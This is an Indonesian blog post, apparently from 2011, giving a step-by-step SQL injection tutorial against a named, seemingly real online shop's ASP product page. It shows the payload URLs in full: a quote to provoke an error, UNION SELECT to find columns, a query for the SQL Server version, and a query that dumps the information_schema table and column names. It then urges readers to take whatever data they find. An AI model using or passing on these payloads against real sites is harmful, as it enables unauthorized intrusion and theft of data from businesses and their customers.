Tutorial MSSQL Injection atau ASP injection

Sunday, 17 April 2011

Tutorial MSSQL Injection atau ASP injection

Conceptnya Sangat Sederhana
Kebanyakan Toko OL Pake Asp ini Lo Bro.
ok langsung aja nih ada contoh site yang vuln :

1	`http://www[dot]astoriapastryshop[dot]com/Product_Des.asp?ProductID=-33`

Tambahi Syntak apa kek misal ‘ / =
Having Error
Microsoft OLE DB Provider for SQL Server error ’80040e14′
Unclosed quotation mark before the character string ”.
/Product_Des.asp, line 11
Lanjut Ke Tahap Kedua

1	`http://www[dot]astoriapastryshop[dot]com/Product_Des.asp?ProductID=-33+union+select+1,2,3,4--`

angka Togelna 3 kan
Kita Cek Versinya Dolo angka Togel /visible Colom dirubah

1	`http://www[dot]astoriapastryshop[dot]com/Product_Des.asp?ProductID=-33+union+select+1,@@VERSION,3,4--`

Microsoft SQL Server 2000 – 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright © 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
Oke Tahap Ketiga
Schema Databesna

1	`http://www[dot]astoriapastryshop[dot]com/Product_Des.asp?ProductID=-33+union+select+all+1,column_name,table_name,4+from+information_schema.columns--`

Nah keluar deh semua data”nya kalo ada yang menarik atau anda cari silahkan sikat aja.

.

Social Icons

Menu

Info contact

Labels

Blog Archive

Sunday, 17 April 2011

Tutorial MSSQL Injection atau ASP injection

No comments:

Post a Comment

HOME

About Me

Popular Posts

Followers